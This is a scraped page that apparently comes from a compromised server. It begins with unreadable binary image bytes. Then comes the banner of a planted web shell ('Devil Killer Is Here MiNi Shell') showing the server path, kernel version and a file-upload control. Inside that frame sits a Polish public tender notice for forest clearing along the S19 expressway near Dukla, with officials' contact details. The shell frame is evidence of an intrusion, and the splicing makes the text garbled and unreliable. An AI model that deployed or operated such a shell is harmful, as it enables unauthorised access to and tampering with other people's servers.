JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231019/0045239501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wylesienie pod drogę ekspresową S19 w Nadleśnictwie Dukla w roku 2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Dukla</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370014604</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Popardy 44</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Równe</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-451</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134373950</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dukla@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dukla.krosno.lasy.gov.pl/witamy</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wylesienie pod drogę ekspresową S19 w Nadleśnictwie Dukla w roku 2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8f2d2823-6e59-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00452395</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_dukla/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w niniejszym postępowaniu, w tym składanie ofert, wymiana informacji<br/>oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków<br/>komunikacji elektronicznej pod adresem https://platformazakupowa.pl/pn/lasy_dukla/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11<br/>rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), niniejszym określa wymagania techniczne umożliwiające<br/>korzystanie z udostępnianej przez Zamawiającego Platformy , https://platformazakupowa.pl/pn/lasy_dukla tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platforma działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez Platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany według<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest<br/>Nadleśnictwo Dukla reprezentowane przez Nadleśniczego Zbigniewa Żywiec, z którym w sprawach dotyczących przetwarzania<br/>danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem dukla@krosno.lasy.gov.pl lub<br/>zbigniew.zywiec@krosno.lasy.gov.pl lub telefonicznie pod numerem +48 668 115 498 Zamawiający nie powołał Inspektora Ochrony<br/>Danych Osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.18.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 156954,46 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi z zakresu gospodarki leśnej zgodnie z określeniem w art. 6 ust. 1 pkt. 1 ustawy z dnia 28<br/>września 1991 r. o lasach (tekst jedn.: Dz. U. z 2022 r. poz. 672 – „Ustawa o lasach”) obejmujące prace z zakresu<br/>pozyskania i zrywki drewna. Są to prace związane z wycinką drzew i krzewów na terenie, na którym będzie<br/>realizowana inwestycja drogowa p.n.:<br/>- „Zaprojektowanie i budowa drogi ekspresowej S19 na odcinku węzeł Dukla (bez węzła) - Barwinek (granica państwa) długości około 18,2 km”. Przedmiot zamówienia będzie realizowany w celu realizacji obowiązków<br/>Zamawiającego określonych w art. 20b ustawy z dnia 10 kwietnia 2003 r. o<br/>szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg<br/>publicznych (t. j. Dz. U. 2023 r., poz. 162) oraz decyzji o środowiskowych<br/>uwarunkowaniach realizacji przedsięwzięcia;<br/>- „Zaprojektowanie i budowa drogi ekspresowej S19 na odcinku od węzła Miejsce<br/>Piastowe (bez węzła) do węzła Dukla (z węzłem) dł. ok. 10,1 km”.<br/>Przedmiot zamówienia będzie realizowany w celu realizacji obowiązków<br/>Zamawiającego określonych w art. 20b ustawy z dnia 10 kwietnia 2003 r. o<br/>szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg<br/>publicznych oraz decyzji o zezwoleniu na realizację budowy drogi ekspresowej S19 („decyzja ZRID”).<br/>Termin wykonania zamówienia: 1 miesiąc liczony od daty udzielenia zamówienia<br/>(zawarcia umowy).<br/>1) Miejscem realizacji przedmiotu zamówienia będzie obszar administracyjny<br/>Nadleśnictwa Dukla - teren leśnictwa Franków;<br/>2) Realizacja prac wchodzących w skład przedmiotu zamówienia będzie się<br/>odbywała na obszarze przeznaczonym pod budowę drogi ekspresowej S19 w<br/>obrębach ewidencyjnych Zboiska i Dukla w Gminie Dukla. Pas wycinki<br/>drzew został wyznaczony w terenie drewnianymi palikami - lokalizacja wg<br/>załącznika mapowego - zał. 2.3.4. Lokalizacja (adres leśny) poszczególnych prac<br/>wchodzących w zakres Przedmiotu Umowy zostanie określona w Zleceniu, o<br/>którym mowa w pkt 3.3. ppkt 1);<br/>3) Postanowienia pkt 7 - 9 nie uchybiają uprawnieniom Zamawiającego<br/>wynikającym z wzoru umowy w sprawie zamówienia publicznego (Załącznik nr<br/>11 do SWZ);<br/>4) Z uwagi na warunki terenowe wykorzystanie maszyn wielooperacyjnych w<br/>niesprzyjających warunkach pogodowych może mieć ograniczone<br/>zastosowanie. Ocena sytuacji w terenie prowadzenia prac należy do<br/>Wykonawcy. Zamawiający nie ogranicza możliwości stosowania ciężkiego<br/>sprzętu. Zamawiający zastrzega, że wykorzystanie ciężkiego sprzętu nie może<br/>prowadzić do zniszczeń w otaczającym drzewostanie co dotyczy zarówno<br/>samego drzewostanu jak i infrastruktury, np. szlaków zrywkowych, dróg,<br/>placów składowych itp. W razie wystąpienia takich szkód Wykonawca jest<br/>zobowiązany naprawić je własnym staraniem i na własny koszt przywracając<br/>stan pierwotny lub dokonać zapłaty równowartości rynkowej tego rodzaju prac; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22594,32 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77200000-2 - Usługi leśnictwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77210000-5 - Usługi pozyskiwania drewna</p> <p class="mb-0">77211100-3 - Usługi cięcia drewna</p> <p class="mb-0">77211200-4 - Transport dłużyc na terenie lasów</p> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">77230000-1 - Usługi doraźne dotyczące leśnictwa</p> <p class="mb-0">77231000-8 - Usługi gospodarki leśnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający nie przewiduje możliwości udzielenia zamówień podobnych, o których<br/>mowa w art. 214 ust. 1 pkt 7 Pzp.<br/>2. Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy w stosunku<br/>do łącznej ilości wszystkich czynności wycenionych w każdej z pozycji kosztorysu<br/>ofertowego stanowiącego część Oferty („Opcja”). Przedmiotem Opcji będą takie same<br/>(analogiczne) prace, jak opisane w SWZ i wycenione przez Wykonawcę w którejkolwiek z<br/>pozycji kosztorysu ofertowego stanowiącego część Oferty. W ramach Opcji, wedle wyboru<br/>Zamawiającego, mogą zostać zlecone wszystkie, niektóre lub tylko jedna z prac wskazanych<br/>w SWZ i wycenionych przez Wykonawcę w kosztorysie ofertowym stanowiącym część<br/>Oferty.<br/>3. Prace będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie<br/>przekraczała 30 % Wartości Przedmiotu Umowy określonej zgodnie z § 10 ust. 1 projektu<br/>umowy stanowiącego Załącznik nr 11 do SWZ. Podstawą określenia wartości prac<br/>zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe<br/>poszczególnych prac zawarte w kosztorysie ofertowym stanowiącym część Oferty.<br/>4. Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a<br/>Wykonawcy nie służy roszczenie o ich zlecenie.<br/>5. Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: (1) wystąpienia<br/>konieczności zwiększenia zakresu rzeczowego usług stanowiących przedmiot zamówienia<br/>w następstwie przyczyn przyrodniczych, klimatycznych, atmosferycznych bądź<br/>związanych z prawidłowym prowadzeniem gospodarki leśnej, (2) zmian na rynku<br/>sprzedaży drewna lub powierzenia Zamawiającemu nowych zadań gospodarczych lub<br/>publicznych, (3)innych okoliczności niezależnych od Zamawiającego a niezbędnych do<br/>wylesienia pod drogę S19. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena – 100 %<br/>2. Sposób obliczania punktów:<br/>W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x 100 % x 100 pkt<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Formularzu Oferty (Załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>3. Za najkorzystniejszą ofertę uznana zostanie Oferta Wykonawcy, która uzyska największą liczbę punktów.<br/>4. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie,<br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert<br/>dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi z zakresu gospodarki leśnej zgodnie z określeniem w art. 6 ust. 1 pkt. 1 ustawy z dnia 28<br/>września 1991 r. o lasach (tekst jedn.: Dz. U. z 2022 r. poz. 672 – „Ustawa o lasach”) obejmujące prace z zakresu<br/>pozyskania i zrywki drewna. Są to prace związane z wycinką drzew i krzewów na terenie, na którym będzie<br/>realizowana inwestycja drogowa p.n.:<br/>- „Zaprojektowanie i budowa drogi ekspresowej S19 na odcinku węzeł Dukla (bez węzła) - Barwinek (granica państwa) długości około 18,2 km”. Przedmiot zamówienia będzie realizowany w celu realizacji obowiązków<br/>Zamawiającego określonych w art. 20b ustawy z dnia 10 kwietnia 2003 r. o<br/>szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg<br/>publicznych (t. j. Dz. U. 2023 r., poz. 162) oraz decyzji o środowiskowych<br/>uwarunkowaniach realizacji przedsięwzięcia;<br/>- „Zaprojektowanie i budowa drogi ekspresowej S19 na odcinku od węzła Miejsce<br/>Piastowe (bez węzła) do węzła Dukla (z węzłem) dł. ok. 10,1 km”.<br/>Przedmiot zamówienia będzie realizowany w celu realizacji obowiązków<br/>Zamawiającego określonych w art. 20b ustawy z dnia 10 kwietnia 2003 r. o<br/>szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg<br/>publicznych oraz decyzji o zezwoleniu na realizację budowy drogi ekspresowej S19 („decyzja ZRID”).<br/>Termin wykonania zamówienia: 1 miesiąc liczony od daty udzielenia zamówienia<br/>(zawarcia umowy).<br/>1) Miejscem realizacji przedmiotu zamówienia będzie obszar administracyjny<br/>Nadleśnictwa Dukla - teren leśnictwa Folusz;<br/>2) Realizacja prac wchodzących w skład przedmiotu zamówienia będzie się<br/>odbywała na obszarze przeznaczonym pod budowę drogi ekspresowej S19 w<br/>obrębie ewidencyjnym Trzciana w Gminie Dukla. Pas wycinki<br/>drzew został wyznaczony w terenie drewnianymi palikami - lokalizacja wg<br/>załącznika mapowego - zał. 2.3.4. Lokalizacja (adres leśny) poszczególnych prac<br/>wchodzących w zakres Przedmiotu Umowy zostanie określona w Zleceniu, o<br/>którym mowa w pkt 3.3. ppkt 1);<br/>3) Postanowienia pkt 7 - 9 nie uchybiają uprawnieniom Zamawiającego<br/>wynikającym z wzoru umowy w sprawie zamówienia publicznego (Załącznik nr<br/>11 do SWZ);<br/>4) Z uwagi na warunki terenowe wykorzystanie maszyn wielooperacyjnych w<br/>niesprzyjających warunkach pogodowych może mieć ograniczone<br/>zastosowanie. Ocena sytuacji w terenie prowadzenia prac należy do<br/>Wykonawcy. Zamawiający nie ogranicza możliwości stosowania ciężkiego<br/>sprzętu. Zamawiający zastrzega, że wykorzystanie ciężkiego sprzętu nie może<br/>prowadzić do zniszczeń w otaczającym drzewostanie co dotyczy zarówno<br/>samego drzewostanu jak i infrastruktury, np. szlaków zrywkowych, dróg,<br/>placów składowych itp. W razie wystąpienia takich szkód Wykonawca jest<br/>zobowiązany naprawić je własnym staraniem i na własny koszt przywracając<br/>stan pierwotny lub dokonać zapłaty równowartości rynkowej tego rodzaju prac; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 134360,14 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77200000-2 - Usługi leśnictwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77210000-5 - Usługi pozyskiwania drewna</p> <p class="mb-0">77211100-3 - Usługi cięcia drewna</p> <p class="mb-0">77211200-4 - Transport dłużyc na terenie lasów</p> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">77230000-1 - Usługi doraźne dotyczące leśnictwa</p> <p class="mb-0">77231000-8 - Usługi gospodarki leśnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający nie przewiduje możliwości udzielenia zamówień podobnych, o których<br/>mowa w art. 214 ust. 1 pkt 7 Pzp.<br/>2. Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy w stosunku<br/>do łącznej ilości wszystkich czynności wycenionych w każdej z pozycji kosztorysu<br/>ofertowego stanowiącego część Oferty („Opcja”). Przedmiotem Opcji będą takie same<br/>(analogiczne) prace, jak opisane w SWZ i wycenione przez Wykonawcę w którejkolwiek z<br/>pozycji kosztorysu ofertowego stanowiącego część Oferty. W ramach Opcji, wedle wyboru<br/>Zamawiającego, mogą zostać zlecone wszystkie, niektóre lub tylko jedna z prac wskazanych<br/>w SWZ i wycenionych przez Wykonawcę w kosztorysie ofertowym stanowiącym część<br/>Oferty.<br/>3. Prace będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie<br/>przekraczała 30 % Wartości Przedmiotu Umowy określonej zgodnie z § 10 ust. 1 projektu<br/>umowy stanowiącego Załącznik nr 11 do SWZ. Podstawą określenia wartości prac<br/>zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe<br/>poszczególnych prac zawarte w kosztorysie ofertowym stanowiącym część Oferty.<br/>4. Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a<br/>Wykonawcy nie służy roszczenie o ich zlecenie.<br/>5. Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: (1) wystąpienia<br/>konieczności zwiększenia zakresu rzeczowego usług stanowiących przedmiot zamówienia<br/>w następstwie przyczyn przyrodniczych, klimatycznych, atmosferycznych bądź<br/>związanych z prawidłowym prowadzeniem gospodarki leśnej, (2) zmian na rynku<br/>sprzedaży drewna lub powierzenia Zamawiającemu nowych zadań gospodarczych lub<br/>publicznych, (3)innych okoliczności niezależnych od Zamawiającego a niezbędnych do<br/>wylesienia pod drogę S19. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie 